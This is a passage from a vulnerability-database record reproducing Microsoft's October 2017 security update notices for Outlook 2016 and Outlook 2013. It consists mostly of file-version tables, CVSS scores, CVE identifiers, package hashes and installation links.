14-Sep-17| 01:00 \noutlph.dll| outlph.dll| 16.0.4534.1000| 358704| 12-Sep-17| 10:28 \noutlvba.dll| outlvba.dll| 16.0.4600.1000| 76536| 14-Sep-17| 01:00 \noutlvbs.dll_0001| outlvbs.dll| 16.0.4600.1000| 75496| 14-Sep-17| 01:00 \npstprx32.dll| pstprx32.dll| 16.0.4600.1000| 1392344| 14-Sep-17| 01:00 \nrm.dll| rm.dll| 16.0.4312.1000| 81584| 12-Sep-17| 10:28 \nscnpst32.dll| scnpst32.dll| 16.0.4600.1000| 460640| 14-Sep-17| 01:00 \nscnpst64.dll| scnpst64.dll| 16.0.4600.1000| 472424| 14-Sep-17| 01:00 \nscnpst64c.dll| scnpst64c.dll| 16.0.4573.1000| 673648| 12-Sep-17| 10:28 \n \n## \n\n__\n\nFor all supported x64-based versions of Outlook 2016\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \noutlook.hol_1025| outlook.hol| | 1300622| 13-Sep-17| 11:35 \noutlook.hol_1026| outlook.hol| | 1445192| 13-Sep-17| 11:35 \noutlook.hol_1029| outlook.hol| | 1414392| 13-Sep-17| 11:35 \noutlook.hol_1030| outlook.hol| | 1323070| 13-Sep-17| 11:35 \noutlook.hol_1031| outlook.hol| | 1366948| 13-Sep-17| 11:35 \noutlook.hol_1032| outlook.hol| | 1551916| 13-Sep-17| 11:35 \noutlook.hol_3082| outlook.hol| | 1454216| 13-Sep-17| 11:35 \noutlook.hol_1061| outlook.hol| | 1466058| 13-Sep-17| 11:35 \noutlook.hol_1035| outlook.hol| | 1449258| 13-Sep-17| 11:35 \noutlook.hol_1036| outlook.hol| | 1414270| 13-Sep-17| 11:35 \noutlook.hol_1037| outlook.hol| | 1279682| 13-Sep-17| 11:35 \noutlook.hol_1081| outlook.hol| | 1285370| 13-Sep-17| 11:35 \noutlook.hol_1050| outlook.hol| | 1323016| 13-Sep-17| 11:35 \noutlook.hol_1038| outlook.hol| | 1415312| 13-Sep-17| 11:35 \noutlook.hol_1057| outlook.hol| | 1386564| 13-Sep-17| 11:35 \noutlook.hol_1040| outlook.hol| | 1474676| 13-Sep-17| 11:35 \noutlook.hol_1041| outlook.hol| | 905776| 13-Sep-17| 11:35 \noutlook.hol_1087| outlook.hol| | 1426976| 13-Sep-17| 11:35 \noutlook.hol_1042| outlook.hol| | 924948| 13-Sep-17| 11:35 \noutlook.hol_1063| outlook.hol| | 1518110| 13-Sep-17| 11:35 \noutlook.hol_1062| outlook.hol| | 1537854| 13-Sep-17| 11:35 \noutlook.hol_1086| outlook.hol| | 1368974| 13-Sep-17| 11:35 \noutlook.hol_1044| outlook.hol| | 1402548| 13-Sep-17| 11:35 \noutlook.hol_1043| outlook.hol| | 1442834| 13-Sep-17| 11:35 \noutlook.hol_1045| outlook.hol| | 1515844| 13-Sep-17| 11:35 \noutlook.hol_1046| outlook.hol| | 1450584| 13-Sep-17| 11:35 \noutlook.hol_2070| outlook.hol| | 1485718| 13-Sep-17| 11:35 \noutlook.hol_1048| outlook.hol| | 1436690| 13-Sep-17| 11:35 \noutlook.hol_1049| outlook.hol| | 1426946| 13-Sep-17| 11:35 \noutlook.hol_1051| outlook.hol| | 1410664| 13-Sep-17| 11:35 \noutlook.hol_1060| outlook.hol| | 1350228| 13-Sep-17| 11:35 \noutlook.hol_2074| outlook.hol| | 1335562| 13-Sep-17| 11:35 \noutlook.hol_9242| outlook.hol| | 1343906| 13-Sep-17| 11:35 \noutlook.hol_1053| outlook.hol| | 1322670| 13-Sep-17| 11:36 \noutlook.hol_1054| outlook.hol| | 1390994| 13-Sep-17| 11:36 \noutlook.hol_1055| outlook.hol| | 1348932| 13-Sep-17| 11:36 \noutlook.hol_1058| outlook.hol| | 1530840| 13-Sep-17| 11:36 \noutlook.hol_1066| outlook.hol| | 1639200| 13-Sep-17| 11:36 \noutlook.hol_2052| outlook.hol| | 805796| 13-Sep-17| 11:36 \noutlook.hol_1028| outlook.hol| | 816268| 13-Sep-17| 11:36 \nmapir.dll_1025| mapir.dll| 16.0.4483.1000| 1251040| 13-Sep-17| 11:35 \noutllibr.dll_1025| outllibr.dll| 16.0.4570.1000| 7502568| 13-Sep-17| 11:35 \nmapir.dll_1026| mapir.dll| 16.0.4483.1000| 1318112| 13-Sep-17| 11:35 \noutllibr.dll_1026| outllibr.dll| 16.0.4570.1000| 7568616| 13-Sep-17| 11:35 \nmapir.dll_1029| mapir.dll| 16.0.4483.1000| 1292512| 13-Sep-17| 11:35 \noutllibr.dll_1029| outllibr.dll| 16.0.4570.1000| 7585512| 13-Sep-17| 11:35 \nmapir.dll_1030| mapir.dll| 16.0.4483.1000| 1297632| 13-Sep-17| 11:35 \noutllibr.dll_1030| outllibr.dll| 16.0.4570.1000| 7513320| 13-Sep-17| 11:35 \nmapir.dll_1031| mapir.dll| 16.0.4483.1000| 1346272| 13-Sep-17| 11:35 \noutllibr.dll_1031| outllibr.dll| 16.0.4570.1000| 7604456| 13-Sep-17| 11:35 \nmapir.dll_1032| mapir.dll| 16.0.4483.1000| 1368288| 13-Sep-17| 11:35 \noutllibr.dll_1032| outllibr.dll| 16.0.4570.1000| 7634152| 13-Sep-17| 11:35 \nmapir.dll_3082| mapir.dll| 16.0.4483.1000| 1334496| 13-Sep-17| 11:35 \noutllibr.dll_3082| outllibr.dll| 16.0.4570.1000| 7555816| 13-Sep-17| 11:35 \nmapir.dll_1061| mapir.dll| 16.0.4483.1000| 1276640| 13-Sep-17| 11:35 \noutllibr.dll_1061| outllibr.dll| 16.0.4570.1000| 7502056| 13-Sep-17| 11:35 \nmapir.dll_1035| mapir.dll| 16.0.4483.1000| 1291488| 13-Sep-17| 11:35 \noutllibr.dll_1035| outllibr.dll| 16.0.4570.1000| 7522024| 13-Sep-17| 11:35 \nmapir.dll_1036| mapir.dll| 16.0.4483.1000| 1346784| 13-Sep-17| 11:35 \noutllibr.dll_1036| outllibr.dll| 16.0.4570.1000| 7594216| 13-Sep-17| 11:35 \nmapir.dll_1037| mapir.dll| 16.0.4483.1000| 1237216| 13-Sep-17| 11:35 \noutllibr.dll_1037| outllibr.dll| 16.0.4570.1000| 7462120| 13-Sep-17| 11:35 \nmapir.dll_1081| mapir.dll| 16.0.4483.1000| 1295072| 13-Sep-17| 11:35 \noutllibr.dll_1081| outllibr.dll| 16.0.4570.1000| 7578856| 13-Sep-17| 11:35 \nmapir.dll_1050| mapir.dll| 16.0.4483.1000| 1301216| 13-Sep-17| 11:35 \noutllibr.dll_1050| outllibr.dll| 16.0.4570.1000| 7528680| 13-Sep-17| 11:35 \nmapir.dll_1038| mapir.dll| 16.0.4483.1000| 1305312| 13-Sep-17| 11:35 \noutllibr.dll_1038| outllibr.dll| 16.0.4570.1000| 7592168| 13-Sep-17| 11:35 \nmapir.dll_1057| mapir.dll| 16.0.4483.1000| 1291488| 13-Sep-17| 11:35 \noutllibr.dll_1057| outllibr.dll| 16.0.4570.1000| 7506152| 13-Sep-17| 11:35 \nmapir.dll_1040| mapir.dll| 16.0.4483.1000| 1321184| 13-Sep-17| 11:35 \noutllibr.dll_1040| outllibr.dll| 16.0.4570.1000| 7547624| 13-Sep-17| 11:35 \nmapir.dll_1041| mapir.dll| 16.0.4549.1000| 1170656| 13-Sep-17| 11:35 \noutllibr.dll_1041| outllibr.dll| 16.0.4570.1000| 7518952| 13-Sep-17| 11:35 \nmapir.dll_1087| mapir.dll| 16.0.4483.1000| 1294560| 13-Sep-17| 11:35 \noutllibr.dll_1087| outllibr.dll| 16.0.4570.1000| 7590120| 13-Sep-17| 11:35 \nmapir.dll_1042| mapir.dll| 16.0.4483.1000| 1162464| 13-Sep-17| 11:35 \noutllibr.dll_1042| outllibr.dll| 16.0.4570.1000| 7498984| 13-Sep-17| 11:35 \nmapir.dll_1063| mapir.dll| 16.0.4483.1000| 1299680| 13-Sep-17| 11:35 \noutllibr.dll_1063| outllibr.dll| 16.0.4570.1000| 7560936| 13-Sep-17| 11:35 \nmapir.dll_1062| mapir.dll| 16.0.4483.1000| 1292512| 13-Sep-17| 11:35 \noutllibr.dll_1062| outllibr.dll| 16.0.4570.1000| 7551720| 13-Sep-17| 11:35 \nmapir.dll_1086| mapir.dll| 16.0.4483.1000| 1294048| 13-Sep-17| 11:35 \noutllibr.dll_1086| outllibr.dll| 16.0.4570.1000| 7514856| 13-Sep-17| 11:35 \nmapir.dll_1044| mapir.dll| 16.0.4483.1000| 1280736| 13-Sep-17| 11:35 \noutllibr.dll_1044| outllibr.dll| 16.0.4570.1000| 7503592| 13-Sep-17| 11:35 \nmapir.dll_1043| mapir.dll| 16.0.4483.1000| 1325792| 13-Sep-17| 11:35 \noutllibr.dll_1043| outllibr.dll| 16.0.4570.1000| 7551208| 13-Sep-17| 11:35 \nmapir.dll_1045| mapir.dll| 16.0.4483.1000| 1319648| 13-Sep-17| 11:35 \noutllibr.dll_1045| outllibr.dll| 16.0.4570.1000| 7591656| 13-Sep-17| 11:35 \nmapir.dll_1046| mapir.dll| 16.0.4561.1000| 1317088| 13-Sep-17| 11:35 \noutllibr.dll_1046| outllibr.dll| 16.0.4588.1000| 7479016| 13-Sep-17| 11:35 \nmapir.dll_2070| mapir.dll| 16.0.4483.1000| 1328352| 13-Sep-17| 11:35 \noutllibr.dll_2070| outllibr.dll| 16.0.4570.1000| 7553256| 13-Sep-17| 11:35 \nmapir.dll_1048| mapir.dll| 16.0.4483.1000| 1309408| 13-Sep-17| 11:35 \noutllibr.dll_1048| outllibr.dll| 16.0.4570.1000| 7590632| 13-Sep-17| 11:35 \nmapir.dll_1049| mapir.dll| 16.0.4483.1000| 1296608| 13-Sep-17| 11:35 \noutllibr.dll_1049| outllibr.dll| 16.0.4600.1000| 7555800| 14-Sep-17| 01:12 \nmapir.dll_1051| mapir.dll| 16.0.4483.1000| 1308896| 13-Sep-17| 11:35 \noutllibr.dll_1051| outllibr.dll| 16.0.4570.1000| 7600872| 13-Sep-17| 11:35 \nmapir.dll_1060| mapir.dll| 16.0.4483.1000| 1295072| 13-Sep-17| 11:35 \noutllibr.dll_1060| outllibr.dll| 16.0.4570.1000| 7544040| 13-Sep-17| 11:35 \nmapir.dll_2074| mapir.dll| 16.0.4444.1000| 1302752| 13-Sep-17| 11:35 \noutllibr.dll_2074| outllibr.dll| 16.0.4561.1000| 7538920| 13-Sep-17| 11:35 \nmapir.dll_9242| mapir.dll| 16.0.4483.1000| 1302752| 13-Sep-17| 11:36 \noutllibr.dll_9242| outllibr.dll| 16.0.4570.1000| 7539432| 13-Sep-17| 11:35 \nmapir.dll_1053| mapir.dll| 16.0.4483.1000| 1285344| 13-Sep-17| 11:36 \noutllibr.dll_1053| outllibr.dll| 16.0.4570.1000| 7510760| 13-Sep-17| 11:36 \nmapir.dll_1054| mapir.dll| 16.0.4483.1000| 1274080| 13-Sep-17| 11:36 \noutllibr.dll_1054| outllibr.dll| 16.0.4570.1000| 7542504| 13-Sep-17| 11:36 \nmapir.dll_1055| mapir.dll| 16.0.4483.1000| 1280224| 13-Sep-17| 11:36 \noutllibr.dll_1055| outllibr.dll| 16.0.4570.1000| 7570152| 13-Sep-17| 11:36 \nmapir.dll_1058| mapir.dll| 16.0.4483.1000| 1299680| 13-Sep-17| 11:36 \noutllibr.dll_1058| outllibr.dll| 16.0.4570.1000| 7561960| 13-Sep-17| 11:36 \nmapir.dll_1066| mapir.dll| 16.0.4483.1000| 1289440| 13-Sep-17| 11:36 \noutllibr.dll_1066| outllibr.dll| 16.0.4570.1000| 7579880| 13-Sep-17| 11:36 \nmapir.dll_2052| mapir.dll| 16.0.4483.1000| 1118432| 13-Sep-17| 11:36 \noutllibr.dll_2052| outllibr.dll| 16.0.4570.1000| 7423208| 13-Sep-17| 11:36 \nmapir.dll_1028| mapir.dll| 16.0.4483.1000| 1121504| 13-Sep-17| 11:36 \noutllibr.dll_1028| outllibr.dll| 16.0.4570.1000| 7428840| 13-Sep-17| 11:36 \nintldate.dll_0001| intldate.dll| 16.0.4549.1000| 128256| 12-Sep-17| 10:31 \noutlook.hol_1033| outlook.hol| | 1335562| 12-Sep-17| 10:31 \nomsmain.dll| omsmain.dll| 16.0.4588.1000| 1004296| 12-Sep-17| 10:31 \nomsxp32.dll| omsxp32.dll| 16.0.4588.1000| 352048| 12-Sep-17| 10:31 \nmapir.dll_1033| mapir.dll| 16.0.4444.1000| 1280736| 12-Sep-17| 10:31 \noutllibr.dll_1033| outllibr.dll| 16.0.4561.1000| 7492328| 12-Sep-17| 10:31 \ncnfnot32.exe_0004| cnfnot32.exe| 16.0.4498.1000| 232128| 12-Sep-17| 10:31 \ncontab32.dll| contab32.dll| 16.0.4600.1000| 201464| 14-Sep-17| 01:02 \ndlgsetp.dll| dlgsetp.dll| 16.0.4561.1000| 138472| 12-Sep-17| 10:31 \nemsmdb32.dll_0005| emsmdb32.dll| 16.0.4600.1000| 6173568| 14-Sep-17| 01:02 \nenvelope.dll| envelope.dll| 16.0.4600.1000| 249096| 14-Sep-17| 01:02 \nexsec32.dll_0001| exsec32.dll| 16.0.4600.1000| 432288| 14-Sep-17| 01:02 \nmapiph.dll| mapiph.dll| 16.0.4540.1000| 481088| 12-Sep-17| 10:31 \nmimedir.dll| mimedir.dll| 16.0.4600.1000| 601280| 14-Sep-17| 01:02 \nmspst32.dll_0004| mspst32.dll| 16.0.4600.1000| 2197352| 14-Sep-17| 01:02 \nolmapi32.dll| olmapi32.dll| 16.0.4600.1000| 6615296| 14-Sep-17| 01:02 \noutlmime.dll| outlmime.dll| 16.0.4600.1000| 783632| 14-Sep-17| 01:02 \noutlook.exe| outlook.exe| 16.0.4600.1000| 34971336| 14-Sep-17| 01:02 \noutlph.dll| outlph.dll| 16.0.4375.1000| 429360| 12-Sep-17| 10:31 \noutlvba.dll| outlvba.dll| 16.0.4600.1000| 97016| 14-Sep-17| 01:02 \noutlvbs.dll_0001| outlvbs.dll| 16.0.4600.1000| 92904| 14-Sep-17| 01:02 \npstprx32.dll| pstprx32.dll| 16.0.4600.1000| 2576592| 14-Sep-17| 01:02 \nrm.dll| rm.dll| 16.0.4444.1000| 110800| 12-Sep-17| 10:31 \nscnpst32.dll| scnpst32.dll| 16.0.4561.1000| 611168| 12-Sep-17| 10:31 \nscnpst64.dll| scnpst64.dll| 16.0.4561.1000| 614248| 12-Sep-17| 10:31 \nscnpst64c.dll| scnpst64c.dll| 16.0.4561.1000| 814456| 12-Sep-17| 10:31 \nolappt.fae| olappt.fae| | 134480| 12-Sep-17| 10:31 \n \nHow to get help and support for this security updateHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>)Security solutions for IT professionals: [Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>)Help for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>)Local support according to your country: [International Support](<http://support.microsoft.com>)Propose a feature or provide feedback on Office: [Office User Voice portal](<https://office.uservoice.com/>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-10T07:00:00", "type": "mskb", "title": "Description of the security update for Outlook 2016: October 10, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774", "CVE-2017-11776"], "modified": "2017-10-10T07:00:00", "id": "KB4011162", "href": "https://support.microsoft.com/en-us/help/4011162", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-25T10:46:55", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-11774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11774>) and [Microsoft Common Vulnerabilities and Exposures CVE-2017-11776](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11776>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 1 for Microsoft Office 2013](<http://support.microsoft.com/kb/2817430>) installed on the computer.Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2013. It doesn't apply to the Office 2013 Click-to-Run editions, such as Microsoft Office 365 Home. (See Determining your Office version.)\n\n## Improvements and fixes\n\nThis security update contains the following improvements and fixes:\n\n * When you use the **Select All** button to select all items in the **Recover Deleted Items **dialog box in a non-English version of Microsoft Outlook 2013, no items are selected.\n * Outlook will not connect by using MAPI/HTTP if certain HTTP headers are received by the client that have unexpected type casing.\n * When you try to connect to the address book after a Microsoft Exchange failover in Outlook 2013, you receive the following error message:\n\nThe Connection to Microsoft Exchange is unavailable.ge content goes here.\n\n * You experience an error occasionally when you try to access the address book.\n * When you change the location of a meeting and select to update the location automatically in Outlook 2013, the displayed location isn't updated for the meeting.\n * Improves some translation for the Russian 32-bit version of Outlook 2013.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011178>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download the security update KB4011178 for the 32-bit version of Outlook 2013](<http://www.microsoft.com/download/details.aspx?familyid=8c8acad9-f961-45d8-83cb-10a7df2f1692>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download the security update KB4011178 for the 64-bit version of Outlook 2013](<http://www.microsoft.com/download/details.aspx?familyid=fe45d51d-19e6-4474-88c2-5bfb8c6c6bec>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: October 10, 2017](<https://support.microsoft.com/en-us/help/20171010>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [KB 4011090](<http://support.microsoft.com/kb/4011090>).\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \noutlook2013-kb4011178-fullfile-x64-glb.exe| BE12EB6CE997BEDD487499BE03D8D4E64146E7C5| 215FD2B0459E651A05BE5032532D000ABF398E5F392D65EBF6EFE861C0659A40 \noutlook2013-kb4011178-fullfile-x86-glb.exe| 364602710E01704EF87F23E18A0AB7753E1082FA| 3E91D0691DF3AC90620046EEE69541AB6A7A2B84FBA7A6830AF84F8EA29473EA \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x86-based versions of Outlook 2013\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \noutlook.hol_1025| outlook.hol| | 1247234| 13-Sep-17| 05:24 \noutlook.hol_1026| outlook.hol| | 1416552| 13-Sep-17| 05:24 \noutlook.hol_1029| outlook.hol| | 1390126| 13-Sep-17| 05:24 \noutlook.hol_1030| outlook.hol| | 1282704| 13-Sep-17| 05:24 \noutlook.hol_1031| outlook.hol| | 1323514| 13-Sep-17| 05:24 \noutlook.hol_1032| outlook.hol| | 1496610| 13-Sep-17| 05:24 \noutlook.hol_3082| outlook.hol| | 1395042| 13-Sep-17| 05:24 \noutlook.hol_1061| outlook.hol| | 1410406| 13-Sep-17| 05:24 \noutlook.hol_1035| outlook.hol| | 1395674| 13-Sep-17| 05:24 \noutlook.hol_1036| outlook.hol| | 1362574| 13-Sep-17| 05:24 \noutlook.hol_1037| outlook.hol| | 1239978| 13-Sep-17| 05:24 \noutlook.hol_1081| outlook.hol| | 1294894| 13-Sep-17| 05:24 \noutlook.hol_1050| outlook.hol| | 1277766| 13-Sep-17| 05:24 \noutlook.hol_1038| outlook.hol| | 1367886| 13-Sep-17| 05:24 \noutlook.hol_1057| outlook.hol| | 1330364| 13-Sep-17| 05:24 \noutlook.hol_1040| outlook.hol| | 1422360| 13-Sep-17| 05:24 \noutlook.hol_1041| outlook.hol| | 884292| 13-Sep-17| 05:24 \noutlook.hol_1087| outlook.hol| | 1380728| 13-Sep-17| 05:24 \noutlook.hol_1042| outlook.hol| | 929084| 13-Sep-17| 05:24 \noutlook.hol_1063| outlook.hol| | 1459512| 13-Sep-17| 05:25 \noutlook.hol_1062| outlook.hol| | 1485582| 13-Sep-17| 05:25 \noutlook.hol_1086| outlook.hol| | 1322932| 13-Sep-17| 05:25 \noutlook.hol_1044| outlook.hol| | 1351932| 13-Sep-17| 05:25 \noutlook.hol_1043| outlook.hol| | 1390782| 13-Sep-17| 05:25 \noutlook.hol_1045| outlook.hol| | 1455940| 13-Sep-17| 05:25 \noutlook.hol_1046| outlook.hol| | 1402770| 13-Sep-17| 05:25 \noutlook.hol_2070| outlook.hol| | 1431656| 13-Sep-17| 05:25 \noutlook.hol_1048| outlook.hol| | 1379156| 13-Sep-17| 05:25 \noutlook.hol_1049| outlook.hol| | 1369156| 13-Sep-17| 05:25 \noutlook.hol_1051| outlook.hol| | 1375134| 13-Sep-17| 05:25 \noutlook.hol_1060| outlook.hol| | 1301884| 13-Sep-17| 05:25 \noutlook.hol_2074| outlook.hol| | 1294950| 13-Sep-17| 05:25 \noutlook.hol_1053| outlook.hol| | 1273680| 13-Sep-17| 05:25 \noutlook.hol_1054| outlook.hol| | 1353176| 13-Sep-17| 05:26 \noutlook.hol_1055| outlook.hol| | 1303712| 13-Sep-17| 05:26 \noutlook.hol_1058| outlook.hol| | 1478448| 13-Sep-17| 05:26 \noutlook.hol_1066| outlook.hol| | 1583106| 13-Sep-17| 05:26 \noutlook.hol_2052| outlook.hol| | 957672| 13-Sep-17| 05:26 \noutlook.hol_1028| outlook.hol| | 1000084| 13-Sep-17| 05:26 \nactivity.cfg_1025| activity.cfg| | 984| 13-Sep-17| 05:24 \nappt.cfg_1025| appt.cfg| | 770| 13-Sep-17| 05:24 \ncnfnot.cfg_1025| cnfnot.cfg| | 296| 13-Sep-17| 05:24 \ncnfres.cfg_1025| cnfres.cfg| | 319| 13-Sep-17| 05:24 \ncontact.cfg_1025| contact.cfg| | 781| 13-Sep-17| 05:24 \ncurrency.htm_1025| currency.htm| | 635| 13-Sep-17| 05:24 \ndadshirt.htm_1025| dadshirt.htm| | 570| 13-Sep-17| 05:24 \ndistlist.cfg_1025| distlist.cfg| | 803| 13-Sep-17| 05:24 \ndoc.cfg_1025| doc.cfg| | 757| 13-Sep-17| 05:24 \nenvelopr.dll_1025| envelopr.dll| 15.0.4442.1000| 18584| 13-Sep-17| 05:24 \nexitem.cfg_1025| exitem.cfg| | 828| 13-Sep-17| 05:24 \nfaxext.ecf_1025| faxext.ecf| | 826| 13-Sep-17| 05:24 \ninfomail.cfg_1025| infomail.cfg| | 612| 13-Sep-17| 05:24 \nipm.cfg_1025| ipm.cfg| | 789| 13-Sep-17| 05:24 \njudgesch.htm_1025| judgesch.htm| | 594| 13-Sep-17| 05:24 \njungle.htm_1025| jungle.htm| | 600| 13-Sep-17| 05:24 \nmapir.dll_1025| mapir.dll| 15.0.4875.1000| 1241824| 13-Sep-17| 05:24 \nnote.cfg_1025| note.cfg| | 781| 13-Sep-17| 05:24 \nnotebook.htm_1025| notebook.htm| | 580| 13-Sep-17| 05:24 \noffisupp.htm_1025| offisupp.htm| | 556| 13-Sep-17| 05:24 \nooftmpl.cfg_1025| ooftmpl.cfg| | 813| 13-Sep-17| 05:24 \noutllibr.dll_1025| outllibr.dll| 15.0.4949.1000| 7814376| 13-Sep-17| 05:24 \noutlperf.ini_1025| outlperf.ini| | 5060| 13-Sep-17| 05:24 \noutlwvw.dll_1025| outlwvw.dll| 15.0.4442.1000| 127104| 13-Sep-17| 05:24 \npmailext.ecf_1025| pmailext.ecf| | 626| 13-Sep-17| 05:24 \npost.cfg_1025| post.cfg| | 764| 13-Sep-17| 05:24 \npostit.cfg_1025| postit.cfg| | 775| 13-Sep-17| 05:24 \nrclrpt.cfg_1025| rclrpt.cfg| | 810| 13-Sep-17| 05:24 \nrecall.cfg_1025| rec.cfg| | 1210| 13-Sep-17| 05:24 \nremote.cfg_1025| remote.cfg| | 766| 13-Sep-17| 05:24 \nrepltmpl.cfg_1025| repltmpl.cfg| | 818| 13-Sep-17| 05:24 \nreport.cfg_1025| report.cfg| | 778| 13-Sep-17| 05:24 \nresend.cfg_1025| resend.cfg| | 789| 13-Sep-17| 05:24 \nrssitem.cfg_1025| rssitem.cfg| | 776| 13-Sep-17| 05:24 \nschdcncl.cfg_1025| schdcncl.cfg| | 804| 13-Sep-17| 05:24 \nschdreq.cfg_1025| schdreq.cfg| | 1183| 13-Sep-17| 05:24 \nschdresn.cfg_1025| schdresn.cfg| | 823| 13-Sep-17| 05:24 \nschdresp.cfg_1025| schdresp.cfg| | 823| 13-Sep-17| 05:24 \nschdrest.cfg_1025| schdrest.cfg| | 829| 13-Sep-17| 05:24 \nsecrec.cfg_1025| secrec.cfg| | 642| 13-Sep-17| 05:24 \nsecure.cfg_1025| secure.cfg| | 631| 13-Sep-17| 05:24 \nsharing.cfg_1025| sharing.cfg| | 756| 13-Sep-17| 05:24 \nsign.cfg_1025| sign.cfg| | 649| 13-Sep-17| 05:24 \nsmimee.cfg_1025| smimee.cfg| | 638| 13-Sep-17| 05:24 \nsmimes.cfg_1025| smimes.cfg| | 666| 13-Sep-17| 05:24 \ntask.cfg_1025| task.cfg| | 761| 13-Sep-17| 05:24 \ntaskacc.cfg_1025| taskacc.cfg| | 789| 13-Sep-17| 05:24 \ntaskdec.cfg_1025| taskdec.cfg| | 788| 13-Sep-17| 05:24 \ntaskreq.cfg_1025| taskreq.cfg| | 784| 13-Sep-17| 05:24 \ntaskupd.cfg_1025| taskupd.cfg| | 794| 13-Sep-17| 05:24 \ntechtool.htm_1025| techtool.htm| | 561| 13-Sep-17| 05:24 \ndadshirt.htm_1026| dadshirt.htm| | 560| 13-Sep-17| 05:24 \nmapir.dll_1026| mapir.dll| 15.0.4875.1000| 1308384| 13-Sep-17| 05:24 \noutllibr.dll_1026| outllibr.dll| 15.0.4949.1000| 8006376| 13-Sep-17| 05:24 \noutlwvw.dll_1026| outlwvw.dll| 15.0.4420.1017| 125552| 13-Sep-17| 05:24 \nenvelopr.dll_1029| envelopr.dll| 15.0.4448.1000| 19048| 13-Sep-17| 05:24 \nmapir.dll_1029| mapir.dll| 15.0.4875.1000| 1283296| 13-Sep-17| 05:24 \noutllibr.dll_1029| outllibr.dll| 15.0.4949.1000| 7948008| 13-Sep-17| 05:24 \noutlperf.ini_1029| outlperf.ini| | 5674| 13-Sep-17| 05:24 \noutlwvw.dll_1029| outlwvw.dll| 15.0.4420.1017| 125568| 13-Sep-17| 05:24 \nactivity.cfg_1030| activity.cfg| | 1000| 13-Sep-17| 05:24 \nenvelopr.dll_1030| envelopr.dll| 15.0.4442.1000| 19112| 13-Sep-17| 05:24 \nmapir.dll_1030| mapir.dll| 15.0.4875.1000| 1288416| 13-Sep-17| 05:24 \noutllibr.dll_1030| outllibr.dll| 15.0.4949.1000| 7920360| 13-Sep-17| 05:24 \noutlwvw.dll_1030| outlwvw.dll| 15.0.4420.1017| 125568| 13-Sep-17| 05:24 \nreport.cfg_1030| report.cfg| | 790| 13-Sep-17| 05:24 \nrssitem.cfg_1030| rssitem.cfg| | 804| 13-Sep-17| 05:24 \nschdreq.cfg_1030| schdreq.cfg| | 1219| 13-Sep-17| 05:24 \nactivity.cfg_1031| activity.cfg| | 1015| 13-Sep-17| 05:24 \nappt.cfg_1031| appt.cfg| | 807| 13-Sep-17| 05:24 \ncnfnot.cfg_1031| cnfnot.cfg| | 342| 13-Sep-17| 05:24 \ncnfres.cfg_1031| cnfres.cfg| | 361| 13-Sep-17| 05:24 \ncontact.cfg_1031| contact.cfg| | 811| 13-Sep-17| 05:24 \ncurrency.htm_1031| currency.htm| | 624| 13-Sep-17| 05:24 \ndadshirt.htm_1031| dadshirt.htm| | 559| 13-Sep-17| 05:24 \ndistlist.cfg_1031| distlist.cfg| | 843| 13-Sep-17| 05:24 \ndoc.cfg_1031| doc.cfg| | 806| 13-Sep-17| 05:24 \nenvelopr.dll_1031| envelopr.dll| 15.0.4442.1000| 19608| 13-Sep-17| 05:24 \nexitem.cfg_1031| exitem.cfg| | 874| 13-Sep-17| 05:24 \nfaxext.ecf_1031| faxext.ecf| | 834| 13-Sep-17| 05:24 \ninfomail.cfg_1031| 